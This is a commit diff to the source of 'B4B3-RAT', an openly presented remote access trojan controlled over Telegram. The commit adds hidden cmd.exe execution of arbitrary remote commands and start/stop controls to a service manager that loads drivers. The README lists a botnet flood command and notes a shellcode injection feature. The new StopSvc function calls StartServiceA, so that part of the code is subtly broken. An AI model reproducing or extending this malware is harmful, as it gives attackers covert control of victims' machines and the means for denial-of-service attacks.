Fixed "system" command. Added new commands in service manager

B4B3-RAT/Builder/DlgProc.cpp

@@ -176,6 +176,8 @@ INT_PTR DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
 						"/user[ID] service show - show all services in system %0A"
 						"/user[ID] service add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] - load driver to system %0A"
 						"/user[ID] service delete [NameService] - delete service from system %0A"
+						"/user[ID] service stop [NameService] - stop the running service %0A"
+						"/user[ID] service start [NameService] - start the stopped service %0A"
 
 						"%0AScreen manager:%0A"
 						"/user[ID] screenshot - take screenshot and send you %0A"
@@ -184,6 +186,9 @@ INT_PTR DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
 						"/botnet start [url] - all users send requests on site %0A"
 						"/botnet stop - stop sending requests %0A"
 
+						"%0ACMD manager:%0A"
+						"/user[ID] system [arguments] - run cmd with arguments %0A"
+
 						"%0ARAT:%0A"
 						"/online - show online users%0A";
 

B4B3-RAT/Stub/Release/Stub.log

@@ -1,8 +1,8 @@
-  BotNet.cpp
+  ServiceManager.cpp
   WinMain.cpp
   Создание кода
-  0 of 1652 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
-    0 functions were new in current compilation
-    0 functions had inline decision re-evaluated but remain unchanged
+  4 of 1654 functions ( 0.2%) were compiled, the rest were copied from previous compilation.
+    3 functions were new in current compilation
+    16 functions had inline decision re-evaluated but remain unchanged
   Создание кода завершено
   Stub.vcxproj -> D:\VisualStudio\source\repos\B4B3-RAT\Release\Stub.exe

B4B3-RAT/Stub/ServiceManager.cpp

@@ -46,7 +46,7 @@ bool DeleteSvc(std::string name) {
 	return Result;
 }
 
-bool AddService(std::string name, std::string displayname, std::string path, DWORD Type, DWORD StartType) {
+bool AddSvc(std::string name, std::string displayname, std::string path, DWORD Type, DWORD StartType) {
 	SC_HANDLE schManager;
 
 	schManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
@@ -56,13 +56,55 @@ bool AddService(std::string name, std::string displayname, std::string path, DWO
 	SC_HANDLE schService = CreateServiceA(schManager, name.c_str(), displayname.c_str(), 
 		SC_MANAGER_ALL_ACCESS, Type, StartType, SERVICE_ERROR_NORMAL, 
 		path.c_str(), NULL, NULL, NULL, NULL, NULL);
+
+	if (schService == NULL) 
+		return false;
+
+	CloseServiceHandle(schManager);
+	CloseServiceHandle(schService);
+
+	return true;
+}
+
+bool StartSvc(std::string name) {
+	SC_HANDLE schManager;
 
-	BOOL Status = schManager == NULL ? true : false;
+	schManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+
+	if (schManager == NULL) 
+		return false;
+
+
+	SC_HANDLE schService = OpenService(schManager, name.c_str(), SERVICE_START);
+	if (schService == NULL)
+		return false;
+
+	BOOL Result = StartServiceA(schService, NULL, NULL);
 
 	CloseServiceHandle(schManager);
 	CloseServiceHandle(schService);
 
-	return Status;
+	return Result;
+}
+
+bool StopSvc(std::string name) {
+	SC_HANDLE schManager;
+
+	schManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+
+	if (schManager == NULL)
+		return false;
+
+	SC_HANDLE schService = OpenService(schManager, name.c_str(), SERVICE_STOP);
+	if (schService == NULL)
+		return false;
+
+	BOOL Result = StartServiceA(schService, NULL, NULL);
+
+	CloseServiceHandle(schManager);
+	CloseServiceHandle(schService);
+
+	return Result;
 }
 
 DWORD ParseTypeDriver(std::string str) {

B4B3-RAT/Stub/ServiceManager.h

@@ -29,7 +29,9 @@ SOFTWARE.
 
 std::string ServiceList();
 bool DeleteSvc(std::string name);
-bool AddService(std::string name, std::string displayname, std::string path, DWORD Type, DWORD StartType);
+bool AddSvc(std::string name, std::string displayname, std::string path, DWORD Type, DWORD StartType);
+bool StartSvc(std::string name);
+bool StopSvc(std::string name);
 
 DWORD ParseTypeDriver(std::string str);
 DWORD ParseStartTypeDriver(std::string str);

B4B3-RAT/Stub/WinMain.cpp

@@ -256,8 +256,8 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) {
 						}
 					}
 
-					//    0     1     2          3                     4                         5            6
-					// service add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] 
+					//  1     2          3                     4                         5            6
+					// add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] 
 					else if (params[1] == "add") {
 						DWORD Type = ParseTypeDriver(params[5]);
 						DWORD StartType = ParseStartTypeDriver(params[6]);
@@ -266,7 +266,7 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) {
 							api.SendTextMessage(s.chatid, "Error! Service not added");
 						}
 						else {
-							if (AddService(params[2], params[3], params[4], Type, StartType)) {
+							if (AddSvc(params[2], params[3], params[4], Type, StartType)) {
 								api.SendTextMessage(s.chatid, "Success! Service has been added");
 							}
 							else {
@@ -275,7 +275,7 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) {
 						}
 					}
 
-					//          2
+					//    1      2
 					// delete [Name]
 					else if (params[1] == "delete") {
 						if (DeleteSvc(params[2])) {
@@ -285,6 +285,28 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) {
 							api.SendTextMessage(s.chatid, "Error! Service not deleted");
 						}
 					}
+
+					//  1      2
+					// start [Name]
+					else if (params[1] == "start") {
+						if (StartSvc(params[2])) {
+							api.SendTextMessage(s.chatid, "Success! Service has been started");
+						}
+						else {
+							api.SendTextMessage(s.chatid, "Error! Service not started");
+						}
+					}
+
+					// 1      2
+					// stop [Name]
+					else if (params[1] == "stop") {
+						if (StopSvc(params[2])) {
+							api.SendTextMessage(s.chatid, "Success! Service has been stopped");
+						}
+						else {
+							api.SendTextMessage(s.chatid, "Error! Service not stopped");
+						}
+					}
 				}
 
 				// SYSTEM
@@ -294,6 +316,14 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) {
 					try {
 						std::string cmd = command.replace(command.find("system "), 7, "");
 
+						char windir[128] = { 0 };
+						if (GetWindowsDirectoryA(windir, sizeof(windir) - 1) != 0) {
+							ShellExecuteA(NULL, "open", std::string(std::string(windir) + "\\System32\\cmd.exe").c_str(), cmd.c_str(), 0, SW_HIDE);
+							api.SendTextMessage(s.chatid, "Success! Command is runned");
+						}
+						else {
+							api.SendTextMessage(s.chatid, "Error! Windows directory is null");
+						}
 					}
 					catch (std::exception) {
 						api.SendTextMessage(s.chatid, "Error! Recheck the parameters");

README.md

@@ -45,6 +45,8 @@
  /user[ID] service show    |                                                         | show all drivers in system    
  /user[ID] service add     | [Name] [DisplayName] [C:\ProgramData\yourdriver.sys] [Type-Driver] [Start-Type] | add your driver in system, Check Type-Driver and Start-Type values in "Service manager parse table"    
  /user[ID] service delete  | [NameService]                                           | delete driver from system
+ /user[ID] service start   | [NameService]                                           | start the stopped service
+ /user[ID] service stop    | [NameService]                                           | stop the started service
 
 
 ### Screen manager:
@@ -58,6 +60,11 @@
  /botnet start             | [https://google.com]                                    | all users send requests on site
  /botnet stop              |                                                         | stop sending requests
 
+### CMD manager:
+ Command name              | Parameters                                              | Description
+ ------------------------- | ------------------------------------------------------- | -----------
+ /user[ID] system          | [/c ping google.com]                                    | run cmd.exe with arguments (hidden)
+
 ### RAT:   
  Command name              | Parameters                                              | Description
  ------------------------- | ------------------------------------------------------- | -----------
@@ -90,6 +97,7 @@ Date       | Time  | Description
 20.10.2020 | 18:49 | Update GUI (change location objects)
 24.10.2020 | 17:11 | Added function for inject shellcode in process ![SHELLCODE](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/INJECT_SHELL.png)
 30.10.2020 | 14:29 | Added botnet ![BOTNET](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/BotNet.png)
+03.11.2020 | 16:53 | Fixed command "system" (cmd manager). Added new commands in service manager (start, stop driver). Cmd manager: ![EXAMPLE1](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/system-example1.png) ![EXAMPLE2](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/system-example2.png) 
 
 
 </details>